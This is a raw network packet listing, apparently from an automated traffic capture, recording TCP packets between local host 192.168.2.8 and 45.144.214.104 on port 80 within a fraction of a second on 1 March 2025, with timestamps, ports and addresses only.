Mar 1, 2025 14:42:23.411043882 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411051989 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411056042 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411068916 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411103010 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411144972 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411159039 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411173105 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411185026 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411187887 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411195993 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411206007 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411212921 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411242008 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411330938 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411343098 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411355019 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411365032 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411381960 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411397934 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411483049 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411494970 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411505938 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411518097 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411531925 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411559105 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411631107 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411648989 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411660910 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411674023 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411678076 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411689997 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411699057 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411701918 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411714077 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411725044 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411736012 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411746025 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411746979 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411760092 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411773920 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411788940 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411804914 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411811113 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411815882 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411827087 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411844969 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411858082 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.411986113 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411997080 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412003040 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412013054 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412019968 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412030935 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412040949 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.412044048 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412070036 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.412070036 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.412147999 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412168980 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412179947 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412190914 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.412194014 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412204981 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412216902 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412219048 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.412230968 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412240028 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.412241936 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412252903 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412265062 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412266016 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.412276030 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412293911 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412308931 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.412309885 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412322044 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412328959 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.412333012 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412345886 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412354946 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.412358046 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412372112 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412384033 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412390947 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.412390947 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.412395954 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412409067 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412419081 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.412421942 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412434101 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412445068 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.412447929 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.412466049 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.457014084 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.497010946 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497040033 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497054100 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497075081 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497087002 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497087002 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.497100115 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497117043 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.497138023 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.497247934 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497260094 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497272968 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497283936 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497297049 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497308016 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497318029 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.497350931 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.497381926 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497394085 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497406006 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497416019 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497428894 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497441053 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497443914 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.497452974 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497461081 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.497467041 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497481108 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.497524023 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.497524977 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497584105 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497596025 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497672081 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.497673035 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497685909 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497698069 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497709036 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497710943 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.497715950 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497747898 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.497915030 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497927904 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497940063 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497951984 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497965097 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497976065 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.497978926 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.497987986 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498001099 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498008013 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498012066 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498020887 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498022079 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498053074 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498058081 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498080015 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498256922 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498269081 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498281002 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498291969 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498297930 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498303890 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498317003 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498317957 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498334885 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498341084 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498347998 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498352051 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498358965 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498363972 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498364925 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498378038 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498413086 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498440027 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498620033 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498636007 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498651028 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498665094 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498677969 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498681068 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498692989 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498703957 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498707056 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498716116 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498728991 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498732090 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498740911 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498753071 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498754025 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498764992 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498776913 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498781919 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498788118 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498800993 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498801947 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498815060 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.498846054 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498872995 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.498874903 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.505991936 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.534879923 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.534893036 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.534960032 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.534986019 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.534997940 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535000086 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.535046101 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535104036 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.535113096 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535125971 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535162926 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.535176992 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535188913 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535200119 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535224915 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.535235882 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535254002 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535275936 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.535378933 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535391092 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535403013 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535413980 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535415888 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.535427094 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535465956 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.535465956 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.535545111 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535556078 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535567999 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535581112 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535588980 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.535590887 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535598040 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535604954 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535660028 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.535808086 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535820961 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535832882 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535844088 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535850048 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.535856962 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535868883 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535875082 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.535881996 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535892010 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535896063 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.535906076 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535917044 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.535917997 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535932064 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535942078 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.535959959 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.535984039 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.536046028 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.536058903 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.536071062 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.536082983 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.536087036 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.536094904 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.536108017 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.536111116 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.536120892 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.536134005 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.536168098 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.536199093 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.536211967 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.536222935 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.536240101 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.536247015 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.536253929 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.536266088 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.536278009 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.536278009 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.536305904 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.582108021 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.591559887 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591573000 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591584921 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591597080 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591608047 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591619015 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591629028 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591633081 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.591641903 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591662884 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591674089 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591697931 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591700077 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.591710091 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591720104 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591722012 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.591732025 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591738939 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591746092 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591751099 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591759920 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.591763020 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591768980 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591774940 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591780901 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.591780901 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591797113 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591809034 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591816902 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.591820002 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591833115 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591849089 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.591849089 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591867924 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591881037 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591890097 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.591892958 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591906071 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591912031 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.591917992 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591928959 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591933012 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.591941118 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591947079 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.591953039 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591964006 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591970921 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.591976881 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591986895 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.591994047 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592000008 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592022896 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592022896 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592036009 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592045069 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592048883 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592058897 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592071056 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592078924 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592082024 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592092991 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592097044 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592104912 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592116117 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592123032 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592127085 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592138052 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592147112 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592159033 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592170000 CET	80	49704	45.144.214.104	192.168.2.8
